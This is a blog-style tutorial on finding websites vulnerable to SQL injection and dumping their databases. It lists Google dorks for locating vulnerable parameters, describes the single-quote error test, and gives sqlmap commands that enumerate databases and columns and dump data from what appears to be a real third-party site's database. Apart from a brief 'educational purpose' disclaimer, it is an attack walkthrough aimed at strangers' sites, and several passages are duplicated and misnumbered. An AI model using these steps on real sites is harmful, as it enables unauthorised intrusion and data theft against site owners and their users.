A WAY TO FIND AND USE SQL INJECTION
On my previous blog I wrote about what SQL injection is and its impact over websites. If you don't follow what is this check it first: Tutorial : A brief story of SQLi
Before going into business I wanna say all of you that it's only for educational purpose. Don't misuse it, It's all about knowing not for showoff.
Well now how you gonna find what website is vulnerable. The easiest way to find we gonna use google dork.
inurl: galary.php id=
There are two databases information_schema and web71-tobago.
Step 2: python .\sqlmap.py -u vulnerable-url -D web71-tobago --columns
Now from the retrieved tables select one and do the rest.
Step 2: python .\sqlmap.py -u vulnerable-url -D web71-tobago -C content --dump
Before going into business I wanna say all of you that it's only for educational purpose. Don't misuse it, It's all about knowing not for showoff.
Well now how you gonna find what website is vulnerable. The easiest way to find we gonna use google dork.
Definition of google dorks: Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.
Here are some dork:
allinurl:*.php?txtCodiInfo=
inurl:read.php?=
inurl:”ViewerFrame?Mode=”
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
Just open google and type one of those dork and wait for result. I'm gonna take the first one as example.
Now go to one of those resulted url and add ' at the end of the url. Then type enter.
If it gives you that type of error back you should feel happy. It means now you can SQLi that site without knowing any further details.
Now, how you gonna SQLi that site manually or using some software. I will prefer using software. using a software named sqlmap you can SQLi and takeover database of a SQLi vulnerable website. Here is the link where you can download it : sqlmap downlpad
Some terminologies for doing sqlmap :
-u : url
-D : --dbs : Database
-T : --tables : table
-C : --columns :column
Now some screen shoots that will help you to understand how that gonna be happen.
Step 1: python .\sqlmap.py -u vulnerable-url --dbs
Step 1: python .\sqlmap.py -u vulnerable-url --dbs
There are two databases information_schema and web71-tobago.
Step 2: python .\sqlmap.py -u vulnerable-url -D web71-tobago --columns
Now from the retrieved tables select one and do the rest.
Step 2: python .\sqlmap.py -u vulnerable-url -D web71-tobago -C content --dump
Thats great ... well now you got what you needed. :)
Also see this video :
Thanks for visiting us. :)
#DIVIDED_BY_ZERO#
#UNITED_BY_ONE#
#PEACE#
Comments
Post a Comment